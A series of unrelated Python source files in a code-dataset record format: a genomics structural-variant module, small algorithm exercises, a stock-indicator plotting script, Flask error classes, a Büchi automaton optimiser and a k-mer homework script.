self.files:\n # for i in range(len(self.files['target_altref_fn'])):\n # for j in range(len(self.files['target_altref_fn'][i])):\n # utils.log(self.logging_name, 'info', 'Indexing kmers for reference sequence %s' % self.files['target_altref_fn'][i])\n # self.kmers['ref'] = utils.load_kmers(utils.run_jellyfish(self.files['target_altref_fn'][i][j], jellyfish, kmer_size), self.kmers['ref'])\n\n utils.log(self.logging_name, 'info', 'Indexing kmers for sample sequence %s' % self.files['sv_cleaned_fq'])\n self.kmers['case'] = {}\n self.kmers['case'] = utils.load_kmers(utils.run_jellyfish(self.files['sv_cleaned_fq'], jellyfish, kmer_size), self.kmers['case'])\n self.kmers['case_sc'] = {}\n self.kmers['case_sc'] = utils.load_kmers(utils.run_jellyfish(self.files['sv_sc_unmapped_fa'], jellyfish, kmer_size), self.kmers['case_sc'])\n sc_mers = set(self.kmers['case'].keys()) & set(self.kmers['case_sc'])\n sample_only_mers = list(sc_mers.difference(set(self.kmers['ref'].keys())))\n\n if 'normal_bam_file' in self.params.opts:\n norm_kmers = {}\n norm_kmers = utils.load_kmers(utils.run_jellyfish(self.files['norm_cleaned_fq'], jellyfish, kmer_size), norm_kmers)\n sample_only_mers = set(sample_only_mers).difference(set(norm_kmers.keys()))\n\n sample_only_mers = list(sample_only_mers)\n\n # Write case only kmers out to file.\n self.files['sample_kmers'] = os.path.join(self.paths['kmers'], self.name + \"_sample_kmers.out\")\n sample_kmer_fout = open(self.files['sample_kmers'], 'w')\n\n self.kmers['case_only'] = {}\n for mer in sample_only_mers:\n sample_kmer_fout.write(\"\\t\".join([str(x) for x in [mer, str(self.kmers['case'][mer])]]) + \"\\n\")\n self.kmers['case_only'][mer] = self.kmers['case'][mer]\n sample_kmer_fout.close()\n\n self.kmers['ref'] = {}\n self.kmers['case'] = {}\n self.kmers['case_sc'] = {}\n\n utils.log(self.logging_name, 'info', 'Writing %d sample-only kmers to file %s' % (len(self.kmers['case_only']), self.files['sample_kmers']))\n self.files['kmer_clusters'] = os.path.join(self.paths['kmers'], self.name + \"_sample_kmers_merged.out\")\n utils.log(self.logging_name, 'info', 'Writing kmer clusters to file %s' % self.files['kmer_clusters'])\n\n self.contigs = assembler.init_assembly(self.kmers['case_only'], self.cleaned_read_recs['sv'], kmer_size, int(self.params.get_param('trl_sr_thresh')), self.params.get_param('read_len'))\n self.cleaned_read_recs = None\n self.kmers['case_only'] = {}\n self.finalize_contigs()\n\n def finalize_contigs(self):\n\n '''\n '''\n\n utils.log(self.logging_name, 'info', 'Finalizing %d assembled contigs' % len(self.contigs))\n for contig_iter, assembled_contig in enumerate(self.contigs):\n utils.log(self.logging_name, 'info', 'Finalizing contig %s' % assembled_contig.seq.value)\n contig_id = self.name + '-contig' + str(contig_iter + 1)\n assembled_contig.write_contig_values(contig_id, self.files['kmer_clusters'], self.paths['contigs'])\n\n def resolve_sv(self):\n\n '''\n '''\n\n utils.log(self.logging_name, 'info', 'Resolving structural variants from %d kmer clusters' % len(self.contigs))\n self.results = self.call_manager.resolve_sv_calls(self.contigs, self.files['target_ref_fn'][0], self.get_values(), self.disc_reads)\n # print self.results\n # sys.exit()\n # contig_iter = 1\n # utils.log(self.logging_name, 'info', 'Resolving structural variants from %d kmer clusters' % len(self.contigs))\n # for assembled_contig in self.contigs:\n # utils.log(self.logging_name, 'info', 'Assessing contig %s' % assembled_contig.seq.value)\n # contig_id = 'contig' + str(contig_iter)\n # ctig = contig.TargetContig(self, contig_id, assembled_contig)\n # ctig.query_ref(self.files['target_ref_fn'][0], self.get_values())\n # ctig.make_calls(self.get_values(), self.disc_reads, self.repeat_mask)\n\n # if ctig.has_result():\n # ctig.write_result(self.paths['output'])\n # ctig.write_bam(self.files['sv_bam_sorted'], self.paths['output'])\n # self.results.append(ctig.result)\n # else:\n # utils.log(self.logging_name, 'info', '%s has no structural variant result.' % ctig.id)\n # contig_iter += 1\n\n def get_values(self):\n\n '''\n '''\n\n return (self.chrom, self.start, self.end, self.name, self.target_intervals)\n\n def has_results(self):\n\n '''\n '''\n\n return len(self.results) > 0\n\n def add_path(self, key, path):\n\n '''Utility function to create all the output directories.\n\n Args:\n key (str): String value to store the file path value.\n path (str): File path value.\n Returns:\n None\n Raises:\n None\n '''\n\n utils.log(self.logging_name, 'info', 'Creating %s %s path (%s)' % (self.name, key, path))\n self.paths[key] = path\n if not os.path.exists(self.paths[key]):\n os.makedirs(self.paths[key])\n\n def set_ref_data(self):\n\n '''\n '''\n\n # Write rmask bed file if needed.\n # if not self.params.opts['keep_repeat_regions'] and 'repeat_mask_file' in self.params.opts:\n # self.logger.info('Extracting repeat mask regions for target gene %s.' % self.name)\n # self.repeat_mask = setup_rmask(self.get_values(), self.paths['ref_data'], self.params.opts['repeat_mask_file'])\n\n # Write reference fasta file if needed.\n for target_refseq_fn in self.files['target_ref_fn']:\n direction = \"forward\"\n if target_refseq_fn.find(\"forward\") == -1:\n direction = \"reverse\"\n utils.log(self.logging_name, 'info', 'Extracting refseq sequence and writing %s' % target_refseq_fn)\n utils.extract_refseq_fa(self.get_values(), self.paths['ref_data'], self.params.get_param('reference_fasta'), direction, target_refseq_fn, self.params.get_param('buffer_size'))\n\n # def setup_rmask(self,marker_fn):\n\n # '''\n # '''\n\n # # Iterate through genes in target list and find repeats in those genes.\n # self.repeat_mask = []\n # if not os.path.isfile(marker_fn):\n # out_fn = self.files['rep_mask_fn']\n # fout = open(out_fn,'w')\n # f = open(self.params.opts['repeat_mask_file'],'rU')\n # flines = f.readlines()\n # for line in flines:\n # line = line.strip()\n # rchr,rbp1,rbp2,rname = line.split(\"\\t\")[0:4]\n # rchr = rchr.replace('chr','')\n # if rchr == self.chrom:\n # if int(rbp1) >= self.start and int(rbp2) <= self.end:\n # fout.write(\"\\t\".join([str(x) for x in [rchr,int(rbp1),int(rbp2),rname]])+\"\\n\")\n # self.repeat_mask.append((rchr,int(rbp1),int(rbp2),rname))\n # f.close()\n # fout.close()\n # cmd = 'touch %s'%marker_fn\n # p = subprocess.Popen(cmd,stdout=subprocess.PIPE,stderr=subprocess.PIPE,shell=True)\n # output, errors = p.communicate()\n # self.logger.info('Completed writing repeat mask file %s, touching marker file %s'%(out_fn,marker_fn))\n # else:\n # rep_f = open(self.files['rep_mask_fn'],'rU')\n # rep_flines = rep_f.readlines()\n # for line in rep_flines:\n # line = line.strip()\n # rchr,rbp1,rbp2,rname = line.split()\n # self.repeat_mask.append((rchr,int(rbp1),int(rbp2),rname))\n # rep_f.close()\n\n # def add_discordant_pe(self, aread, read_d, bamfile):\n # qname = aread.qname\n # # Keep discordant read pairs\n # if aread.mapq > 0 and ((aread.rnext!=-1 and aread.tid != aread.rnext) or abs(aread.tlen) > 1000) and not aread.mate_is_unmapped:\n # mate_refid = bamfile.getrname(aread.rnext)\n # mate_read = bamfile.mate(aread)\n # if mate_read.mapq > 0:\n # if mate_refid not in read_d['disc']: read_d['disc'][mate_refid] = []\n # read_d['disc'][mate_refid].append((aread.pos, aread.pnext))\n\n # if aread.mapq > 0 and not aread.mate_is_unmapped and aread.tid == aread.mrnm:\n # if aread.is_read1:\n # read_positions = None\n # if aread.is_reverse and aread.mate_is_reverse:\n # # reverse -- reverse, samflag 115 (note: only considering read1, read2 samflag 179)\n # read_positions = (aread.pos, aread.mpos, 0, 0, qname)\n # if aread.mpos < aread.pos: read_positions = (aread.mpos, aread.pos, 0, 0, qname)\n # read_d['inv_reads'].append(read_positions)\n # elif not aread.is_reverse and not aread.mate_is_reverse:\n # # forward -- forward = samflag 67 (note: only considering read1, read2 samflag 131)\n # read_positions = (aread.pos, aread.mpos, 1, 1, qname)\n # if aread.mpos < aread.pos: read_positions = (aread.mpos, aread.pos, 1, 1, qname)\n # read_d['inv_reads'].append(read_positions)\n # elif aread.is_reverse and not aread.mate_is_reverse and aread.pos < aread.mpos:\n # # reverse -- forward = samflag 83 with positive insert (read2 samflag 163 with + insert size)\n # read_positions = (aread.pos, aread.mpos, 0, 1, aread.qname)\n # read_d['td_reads'].append(read_positions)\n # elif not aread.is_reverse and aread.mate_is_reverse and aread.mpos < aread.pos:\n # # reverse -- forward = samflag 99 with - insert (read2 samflag 147 with - insert)\n # read_positions = (aread.mpos, aread.pos, 1, 0, qname)\n # read_d['td_reads'].append(read_positions)\n # if read_positions: read_d['other'].append(read_positions)\n\n # def pe_meta(self, aread):\n\n # '''\n # '''\n\n # # First check if read is from a proper paired-end mapping --> <--\n # proper_map = False\n # overlap_reads = False\n # if ( ((aread.flag==83) or (aread.flag==147)) and (aread.isize<0) ) or (((aread.flag==99) or (aread.flag==163)) and (aread.isize>0)):\n # proper_map = True\n # if abs(aread.isize) < 2*len(aread.seq):\n # overlap_reads = True\n # return proper_map, overlap_reads\n\n def check_overlap(self, dir, mseq, sc_seq):\n\n '''\n '''\n\n if dir == 'back':\n return mseq.find(sc_seq) != (len(mseq)-len(sc_seq))\n else: return mseq.find(sc_seq) != 0\n\n\n def check_pair_overlap(self, mate_seq, read, coords, trim_dir):\n\n '''\n '''\n\n nmisses = 0\n add_sc = True\n sc_seq = read.seq[coords[0]:coords[1]]\n sc_len = coords[1] - coords[0]\n\n if abs(read.isize) < len(read.seq):\n # Adapter seq\n if abs(len(read.seq) - (abs(read.isize)+1)) >= sc_len:\n add_sc = False\n # print 'Adapter seq', sc_len, abs(read.isize), abs(len(read.seq) - abs(read.isize)), add_sc\n else:\n # abs((2*len(read.seq) - (abs(read.isize)+1)) - sc_len) < 5: add_sc_len_check = False\n while self.check_overlap(trim_dir, mate_seq, sc_seq) and nmisses < 5 and len(sc_seq) > 0:\n if trim_dir == 'back':\n sc_seq = sc_seq[0:(len(sc_seq)-1)]\n else:\n sc_seq = sc_seq[1:len(sc_seq)]\n nmisses += 1\n # print 'Done checking', sc_seq, nmisses\n add_sc = (len(sc_seq) == 0) or (nmisses == 5)\n # if trim_dir == 'back':\n # q = read.qual\n # read.seq = read.seq[coords[1]:len(q)]\n # read.qual = q[coords[1]:len(q)]\n # else:\n # indx = read.seq.find(sc_seq)\n # q = read.qual\n # read.seq = read.seq[0:coords[0]]\n # read.qual = q[0:coords[0]]\n # print 'Checked read pair overlap', read.qname, read.seq\n # print 'Using mate seq check', add_sc, sc_seq, mate_seq\n return add_sc #, read\n\n # def write_results(self):\n\n # '''\n # '''\n\n # result_files = {}\n # for res in self.results:\n # tag = res[6]\n # if tag.find('rearrangement') > -1:\n # tag = 'rearrangement'\n # if tag not in result_files:\n # header = \"\\t\".join(['genes', 'target_breakpoints', 'align_cigar', 'mismatches', 'strands', 'rep_overlap_segment_len', 'sv_type', 'split_read_count', 'nkmers', 'disc_read_count', 'breakpoint_coverages', 'contig_id', 'contig_seq']) + \"\\n\"\n # res_fn = os.path.join(self.paths['output'], self.name + \"_\" + tag + \"_svs.out\")\n # utils.log(self.logging_name, 'info', 'Writing %s results to file %s' % (tag, res_fn))\n # result_files[tag] = open(res_fn, 'w')\n # if not self.params.opts['no_output_header']:\n # result_files[tag].write(header)\n # result_files[tag].write(\"\\t\".join([str(x) for x in res]) + \"\\n\")\n # for f in result_files:\n # result_files[f].close()\n\n def write_results(self):\n\n '''\n '''\n\n res_fn = os.path.join(self.paths['output'], self.name + \"_svs.out\")\n result_file = open(res_fn, 'w')\n header = \"\\t\".join(['genes', 'target_breakpoints', 'mismatches', 'strands', 'total_matching', 'sv_type', 'sv_subtype', 'split_read_count', 'disc_read_count', 'breakpoint_coverages', 'contig_id', 'contig_seq']) + \"\\n\"\n result_file.write(header)\n\n for res in self.results:\n utils.log(self.logging_name, 'info', 'Writing results to file: %s' % res_fn)\n formatted_result_str = res.get_output_string()\n result_file.write(formatted_result_str)\n self.formatted_results.append(formatted_result_str)\n result_file.close()\n\n def get_sv_counts(self):\n\n '''\n '''\n\n total = 0\n rearr_genes = []\n for res in self.results:\n tag = res[6]\n if tag.find('rearrangement') > -1:\n tag = 'rearrangement'\n if tag == 'rearrangment':\n genes = res[0].split(\",\")\n genes.sort()\n rearr_genes.append(\";\".join(genes))\n else:\n self.svs[tag][0] += 1\n total += 1\n if len(set(rearr_genes)) > 0:\n total += len(set(rearr_genes))\n self.svs[tag][0] = len(set(rearr_genes))\n self.svs[tag][1] = \",\".join(list(set(rearr_genes)))\n return total\n\n def get_summary(self):\n\n '''\n '''\n\n header = ['Target','N_contigs', 'Total_variants']\n total = self.get_sv_counts()\n str_out = self.name + '\\t' + str(len(self.contigs)) + '\\t' + str(total) + '\\t'\n keys = self.svs.keys()\n keys.sort()\n header += ['N_'+str(x) for x in keys]\n rearrs = '-'\n for t in keys:\n if t == 'rearrangment':\n rearrs = self.svs[t][1]\n str_out += str(self.svs[t][0]) +'\\t'\n header.append('Rearrangements')\n str_out += rearrs\n return \"\\t\".join(header), str_out\n\n def rm_output_dir(self):\n\n '''\n '''\n\n shutil.rmtree(self.paths['output'])\n","repo_name":"teng-gao/BreaKmer_analysis","sub_path":"breakmer/processor/target.py","file_name":"target.py","file_ext":"py","file_size_in_byte":35313,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"25569382774","text":"class Solution:\n # @return a list of integers\n def grayCode(self, n):\n if( n<= 0):\n return [0]\n result = self.BinaryGray(n)\n for i in range(len(result)):\n result[i] = int(result[i] ,2)\n return result\n\n\n def BinaryGray(self, n):\n if (n == 1):\n return ['0','1']\n \n temp = self.BinaryGray(n-1)\n temp1 = self.BinaryGray(n-1)\n temp1.reverse()\n \n result = []\n for i in range(len(temp)):\n result.append('0'+ temp[i])\n \n for i in range(len(temp1)):\n result.append('1'+temp1[i])\n return result\n","repo_name":"jinmingmu/codeingInterview","sub_path":"Gray_Code.py","file_name":"Gray_Code.py","file_ext":"py","file_size_in_byte":662,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"37122270972","text":"def solution(survey, choices):\n\n # 유형별 점수 및 유형별 index\n scores = [0] * 8\n dic = {'R': 0, 'T': 1, 'C': 2, 'F': 3, 'J': 4, 'M': 5, 'A': 6, 'N': 7}\n\n # 질문에 따라 점수를 더함\n for i in range(len(survey)):\n score = choices[i] - 4\n if score < 0:\n scores[dic[survey[i][0]]] -= score\n elif score > 0:\n scores[dic[survey[i][1]]] += score\n\n # 검사 결과\n answer = ''\n answer += 'T' if scores[0] < scores[1] else 'R'\n answer += 'F' if scores[2] < scores[3] else 'C'\n answer += 'M' if scores[4] < scores[5] else 'J'\n answer += 'N' if scores[6] < scores[7] else 'A'\n return answer","repo_name":"sohyeonnn/Problem-Solving","sub_path":"프로그래머스/lv1/118666. 성격 유형 검사하기/성격 유형 검사하기.py","file_name":"성격 유형 검사하기.py","file_ext":"py","file_size_in_byte":678,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"40253681208","text":"'''\nhttps://leetcode-cn.com/problems/subarray-sums-divisible-by-k\n\n给定一个整数数组 A,返回其中元素之和可被 K 整除的(连续、非空)子数组的数目。\n \n示例:\n输入:A = [4,5,0,-2,-3,1], K = 5\n输出:7\n解释:\n有 7 个子数组满足其元素之和可被 K = 5 整除:\n[4, 5, 0, -2, -3, 1], [5], [5, 0], [5, 0, -2, -3], [0], [0, -2, -3], [-2, -3]\n\n \n提示:\n\n1 <= A.length <= 30000\n-10000 <= A[i] <= 10000\n2 <= K <= 10000\n'''\n\nclass Solution:\n def subarraysDivByK(self, A, K):\n \"\"\"\n :type A: List[int]\n :type K: int\n :rtype: int\n \"\"\"\n \n\n\nif __name__ == '__main__':\n s = Solution()\n # ret = s.\n print(s)\n","repo_name":"chanfengsr/AllPrivateProject","sub_path":"Python/LeetCodeTraining/题库/0974 和可被 K 整除的子数组(Subarray Sums Divisible by K).py","file_name":"0974 和可被 K 整除的子数组(Subarray Sums Divisible by K).py","file_ext":"py","file_size_in_byte":702,"program_lang":"python","lang":"zh","doc_type":"code","stars":5,"dataset":"github-code","pt":"77"} +{"seq_id":"5845947749","text":"import matplotlib.pyplot as plt\nfrom investar import Analyzer\n\nmk = Analyzer.MarketDB()\ndf = mk.get_daily_price('금양','2019-12-31','2023-03-06')\n \ndf['MA20'] = df['close'].rolling(window=20).mean() \ndf['stddev'] = df['close'].rolling(window=20).std() \ndf['upper'] = df['MA20'] + (df['stddev'] * 2)\ndf['lower'] = df['MA20'] - (df['stddev'] * 2)\ndf['PB'] = (df['close'] - df['lower']) / (df['upper'] - df['lower'])\n\ndf['II'] = (2*df['close']-df['high']-df['low'])/(df['high']-df['low'])*df['volume']\ndf['IIP21'] = df['II'].rolling(window=21).sum()/df['volume'].rolling(window=21).sum()*100\ndf = df.dropna()\n\nplt.figure(figsize=(9, 9))\nplt.subplot(3, 1, 1)\nplt.title('SK Hynix Bollinger Band(20 day, 2 std) - Reversals')\nplt.plot(df.index, df['close'], 'm', label='Close')\nplt.plot(df.index, df['upper'], 'r--', label ='Upper band')\nplt.plot(df.index, df['MA20'], 'k--', label='Moving average 20')\nplt.plot(df.index, df['lower'], 'c--', label ='Lower band')\nplt.fill_between(df.index, df['upper'], df['lower'], color='0.9')\nfor i in range(0, len(df.close)):\n if df.PB.values[i] < 0.05 and df.IIP21.values[i] > 0: # ①%b가 0.05보다 작고,21일 기준II%가 0보다 크다면\n plt.plot(df.index.values[i], df.close.values[i], 'r^') # ②첫번째 그래프에서 매수 시점을 나타내는 종가 위치에 빨간색삼각형을 표시\n elif df.PB.values[i] > 0.95 and df.IIP21.values[i] < 0: # ③%b가 0.95보다크고,21일 기준II%가 0보다 작으면\n plt.plot(df.index.values[i], df.close.values[i], 'bv') # ④첫번째 그래프에 매도 시점을 나타내는 종가위치에 파란색 삼각형을 표시\nplt.legend(loc='best')\n\nplt.subplot(3, 1, 2)\nplt.plot(df.index, df['PB'], 'b', label='%b')\nplt.grid(True)\nplt.legend(loc='best')\n\nplt.subplot(3, 1, 3)\nplt.bar(df.index, df['IIP21'], color='g', label='II% 21day')\nfor i in range(0, len(df.close)):\n if df.PB.values[i] < 0.05 and df.IIP21.values[i] > 0:\n plt.plot(df.index.values[i], 0, 'r^') # ⑤세 번째 일중강도율 그래프에서 매수시점을 빨간색 삼각형으로 표시\n elif df.PB.values[i] > 0.95 and df.IIP21.values[i] < 0:\n plt.plot(df.index.values[i], 0, 'bv') # ⑥세번째 일중강도율 그래프에서 매도시점을 파란색삼각형으로 표시\nplt.grid(True)\nplt.legend(loc='best')\nplt.show()\n\n \n","repo_name":"syslians/investar","sub_path":"BolingerbandSKrevals.py","file_name":"BolingerbandSKrevals.py","file_ext":"py","file_size_in_byte":2367,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"71805231289","text":"from flask_api import FlaskAPI\nfrom flask import Flask, request, jsonify, render_template, make_response\n\napi = FlaskAPI(__name__)\n\nclass BaseError(Exception):\n \"\"\"Base Error Class\"\"\"\n\n def __init__(self, code=400, message='', status='', field=None):\n Exception.__init__(self)\n self.code = code\n self.message = message\n self.status = status\n self.field = field\n\n def to_dict(self):\n return {'code': self.code,\n 'message': self.message,\n 'status': self.status,\n 'field': self.field, }\n\nclass NotFoundError(BaseError):\n def __init__(self,field, message='Not found'):\n BaseError.__init__(self)\n self.code = 404\n self.message = message\n self.status = 'NOT_FOUND'\n self.field = field\n\nclass FileWriteError(BaseError):\n def __init__(self,field, message='Write error'):\n BaseError.__init__(self)\n self.code = 404\n self.message = message\n self.status = 'WRITE_FAILED'\n self.field = field\n\nclass ConnectionError(BaseError):\n def __init__(self,field, message=\"Couldn't connect\"):\n BaseError.__init__(self)\n self.code = 404\n self.message = message\n self.status = 'NO_CONNECTION'\n self.field = field\n\nclass NotAuthorizedError(BaseError):\n def __init__(self, message='Unauthorized'):\n BaseError.__init__(self)\n self.code = 401\n self.message = message\n self.status = 'NOT_AUTHORIZED'\n\n\nclass ValidationError(BaseError):\n def __init__(self, field, message='Invalid field'):\n BaseError.__init__(self)\n self.code = 400\n self.message = message\n self.status = 'INVALID_FIELD'\n self.field = field\n\nclass InvalidServiceError(BaseError):\n def __init__(self, field, message='Invalid field'):\n BaseError.__init__(self)\n self.code = 400\n self.message = message\n self.status = 'INVALID_SERVICE'\n self.field = field\n\nclass ServerError(BaseError):\n def __init__(self, message='Internal server error'):\n BaseError.__init__(self)\n self.code = 500\n self.message = message\n self.status = 'SERVER_ERROR'\n\n@api.errorhandler(NotFoundError)\n@api.errorhandler(NotAuthorizedError)\n@api.errorhandler(ValidationError)\n@api.errorhandler(InvalidServiceError)\n\ndef handle_error(error):\n code=getattr(error,'code')\n status = getattr(error, 'status')\n field = [getattr(error, 'field')]\n code = getattr(error, 'code')\n message = getattr(error, 'message')\n success = False\n return make_error(status,field,code,message,success)\n # ,code,message)\n\n\n@api.errorhandler\ndef default_error_handler(error):\n \"\"\"Returns Internal server error\"\"\"\n return error.to_dict(), getattr(error, 'code', 500)\n\ndef make_error(status,field,code,message,success):\n response = jsonify({\n 'status': status,\n 'code': code,\n 'message': field,\n 'error': message,\n 'success' : success\n })\n return response\n\n\n\n\n\n\n\n","repo_name":"deekshaaneja/fintech_product_xa","sub_path":"BaseError.py","file_name":"BaseError.py","file_ext":"py","file_size_in_byte":3059,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"39112370747","text":"###################################################################\n# Barbora Šmahlíková\n# 2020/2021\n# Optimizations for Büchi automata\n###################################################################\n\nfrom automaton import Automaton\nfrom intersection import *\nfrom direct import reduction\nimport atomic_automata\n\ndef tarjan(a):\n \"\"\"Tarjan's algorithm.\"\"\"\n \n index=0\n stack=[] # empty stack\n visited={i : [-1,-1,False] for i in a.states} # state : [index,lowlink,onStack]\n all_components=list()\n\n def scc(v):\n \"\"\"Inner functions to find strongly connected components\"\"\"\n\n nonlocal index\n\n # Set the depth index for v to the smallest unused index\n visited[v][0]=index\n visited[v][1]=index\n index+=1\n stack.append(v)\n visited[v][2]=True\n\n # Successors of v\n for w in a.states:\n if any(t[2]==w and t[0]==v for t in a.transitions):\n if visited[w][0]==-1:\n # Successor w has not yet been visited -> recursion\n scc(w)\n visited[v][1]=min(visited[v][1],visited[w][1])\n \n elif visited[w][2]:\n # Successor w is on stack and hence in the current SCC\n # If w is not on stack, then (v,w) is a transition pointing to an SCC already found and must be ignored\n visited[v][1]=min(visited[v][1],visited[w][0])\n \n # If v is a root state, pop the stack and generate a SCC\n if visited[v][1]==visited[v][0]:\n # Start a new strongly connected component\n component=set()\n w=stack.pop()\n\n while w!=v:\n visited[w][2]=False\n # Add w to current scc\n component.add(w)\n w=stack.pop()\n \n visited[w][2]=False\n component.add(w)\n all_components.append(component)\n\n for v in visited:\n if visited[v][0] == -1:\n scc(v)\n\n return all_components\n\ndef remove_useless_scc(a):\n \"\"\"Removes useless strongly connected components - components from which we can't reach to any other scc \n and no state in scc is accepting or components containing only one accepting state with no transition from it.\"\"\"\n\n components=tarjan(a)\n empty = empty_language(a, components)\n if empty:\n a = atomic_automata.false()\n return True # empty language\n\n change=True\n while change:\n change=False\n for c in components:\n remove=True\n \n # Components from which it can't be reached to any other scc and where no state is accepting or \n # it contains only one state which is accepting\n if (not any(state in a.accept for state in c)) or (len(c)==1 and all(state in a.accept for state in c)):\n for state in c:\n if any((t[0]==state and t[2] not in c) for t in a.transitions):\n remove=False\n if len(c)==1 and state in a.accept and any((t[0]==state and t[2]==state) for t in a.transitions):\n remove=False\n \n # Remove whole component\n if remove:\n change=True\n for state in c:\n if state not in a.start:\n a.states.remove(state)\n if state in a.start:\n a.start.remove(state)\n if state in a.accept:\n a.accept.remove(state)\n transitions=copy(a.transitions)\n for t in transitions:\n if t[0]==state or t[2]==state:\n a.transitions.remove(t)\n components.remove(c)\n \n return False # non-empty language\n\ndef empty_language(a, components):\n \"\"\"Testing language emptiness\"\"\"\n\n empty = True\n for component in components:\n if any(state in a.accept for state in component):\n if len(component)==1:\n for state in component:\n if any(t[0]==t[2] and t[0]==state for t in a.transitions):\n empty = False\n return empty\n else:\n empty = False\n return empty\n return empty\n\ndef find_and_change_cycles(a):\n \"\"\"Finds double cycles and reduces them if possible.\"\"\"\n\n accept2=set()\n end=False\n while not end:\n end=True\n for q in a.accept:\n \n # Every accept state has list [[[visited_states],[inputs]]]\n # Every possible path from q is in visited1\n visited1=[[[q], list()]]\n for v in visited1:\n # Visited state is the corresponding state in the 2nd copy or such a state doesn't exist\n if (v[0][0]==q[0] and v[0][1]==q[1] and v[0][2]!=q[2]) or (q[0],q[1],2) not in a.states:\n break\n \n seen_states=list() # All states seen on the path\n for t in a.transitions:\n # All transitions from the last visited state\n if t[0]==v[0][-1]:\n seen_states=copy(v[0])\n seen_states.append(t[2])\n new=copy([copy(seen_states), copy(v[1])]) # Add one new state that can be visited\n # Add this state only if it wasn't visited before\n if all(new[0][-1]!=u[0][-1] for u in visited1):\n new[1].append(t[1])\n visited1.append(new)\n\n visited2=list() # Visited states on the way back\n for v in visited1:\n # Last visited state was the corresponding one in the 2nd copy\n if v[0][-1][0]==q[0] and v[0][-1][1]==q[1] and v[0][-1][2]!=q[2]:\n visited2=[copy(v)]\n new_state=[copy(v[0][-1])] \n new_state2=list()\n new_list=copy(v[1])\n \n for i in v[1]: # for every input symbol\n first=True\n for t in a.transitions:\n if t[0] in new_state and t[1]==i:\n if first:\n new_list.remove(i) # remove input symbol\n first=False\n new=copy([copy(t[2]), copy(new_list)])\n visited2.append(new) \n new_state2.append(t[2]) \n \n # Cycle was found\n if len(new[1])==0 and new[0]==v[0][0]: \n # Cycle new[0]->v[0][-1]->new[0] for input 2*v[1]\n end=False\n # Add the corresponding state in the 2nd copy to accepting states\n accept2.add(v[0][-1]) \n for t2 in a.transitions:\n if t2[2][0]==v[0][0][0] and t2[2][1]==v[0][0][1] and ((t2[0][0],t2[0][1],1) in v[0][:-1] or (t2[0][0],t2[0][1],2) in v[0][:-1]):\n # Replace the arrow to the other copy\n t2[2]=list(t2[2])\n t2[2][2]=(t2[2][2])%2+1\n t2[2]=tuple(t2[2])\n new_state=copy(new_state2)\n\n # add new accept states\n for q in accept2:\n a.accept.add(q)\n \n # remove old accept states\n accept2=copy(a.accept)\n for q in a.accept:\n if q not in a.states and q not in accept2:\n accept2.remove(q)\n a.accept=copy(accept2)\n \n return a\n\n\ndef remove_unreachable_parts(a):\n \"\"\"Removes unreachable parts of an automaton.\"\"\"\n\n # Find all reachable states\n reachable=list()\n for st in a.start:\n reachable.append(st)\n \n quit=False\n while not quit:\n quit=True\n for t3 in a.transitions:\n if t3[0] in reachable and t3[2] not in reachable:\n reachable.append(t3[2])\n quit=False\n \n # Remove useless transitions\n transitions2=copy(a.transitions)\n for t in a.transitions:\n if t[0] not in reachable or t[2] not in reachable:\n transitions2.remove(t)\n a.transitions=copy(transitions2)\n \n # Remove unreachable states\n states=copy(a.states)\n for s in states:\n if s not in reachable:\n a.states.remove(s)\n \n # Remove unreachable accept states\n accept2=copy(a.accept)\n for i in a.accept:\n if i not in a.states:\n accept2.remove(i)\n elif (not any(t[0]==i or t[2]==i for t in a.transitions)):\n accept2.remove(i)\n elif not any(t[2]==i for t in a.transitions):\n accept2.remove(i)\n a.accept=copy(accept2)\n \n return a\n\ndef optimize(a):\n edit_names(a)\n a=remove_unreachable_parts(a)\n empty = remove_useless_scc(a)\n if empty:\n # empty language\n a = atomic_automata.false()\n return True \n\n reduction(a)\n a=remove_unreachable_parts(a)\n edit_names(a)\n edit_transitions(a)\n return False","repo_name":"barbora4/projektova-praxe","sub_path":"optimize.py","file_name":"optimize.py","file_ext":"py","file_size_in_byte":9565,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"4806943266","text":"#!/usr/bin/env python3\n\n\"\"\"Count all kmers in a FASTA file \"\"\"\n\n\n\nfrom fasta import FASTAReader \nimport sys\n\nreader1 = FASTAReader(open( sys.argv[1])) #SUBSET/TARGET\nreader2 = FASTAReader(open( sys.argv[2])) #QUERY/YAK\nk = int( sys.argv[3] ) #K\n\nkmer_positions = dict()\ntarget_seq_d = {}\nextension_list = {}\n\nfor ident, sequence in reader1:\n sequence = sequence.upper()\n target_seq_d[ident] = sequence\n \n for i in range( 0, len(sequence)-k+1 ):\n kmer = sequence[i:i+k]\n if kmer in kmer_positions:\n kmer_positions[kmer].append((ident,i))\n else:\n kmer_positions[kmer] = [(ident,i)]\n \nfor ident, sequence in reader2:\n sequence = sequence.upper()\n for j in range( 0, len(sequence)-k+1 ):\n kmer = sequence[j:j+k]\n if kmer in kmer_positions:\n value = kmer_positions[kmer]\n for ident,i in value:\n \n target_seq = target_seq_d[ident]\n length_target = len(target_seq)\n length_query = len(sequence)\n extend_right = True\n extended_kmer = kmer \n i = 0\n j = 0\n while True:\n if extend_right:\n if sequence[k+j+1] == target_seq[k+i+1]:\n i += 1\n j += 1\n extended_kmer += sequence[k+j+1]\n else:\n extend_right = False \n extension_list[extended_kmer] = target_seq \n else:\n break\n if i+k == length_target or j+k == length_query :\n extend_right = False\n break\nsorted(extended_kmer, reverse = True, key = len) \nfor extended_kmer in extension_list:\n print(extended_kmer) \n \n \n \n \n \n","repo_name":"bersabel/qbb2019-answers","sub_path":"day3-homework/day3-homework-finish.py","file_name":"day3-homework-finish.py","file_ext":"py","file_size_in_byte":1981,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"14379676842","text":"def existsSumInArray(valueToCompare, values):\n\tfor firstValue in values :\n\t\tfor secondValue in values :\n\t\t\tif firstValue != secondValue and (firstValue + secondValue) == valueToCompare:\n\t\t\t\treturn True;\n\treturn False;\n\ndef sumContiguous(valueToCompare, values):\n\tsetNumbers = 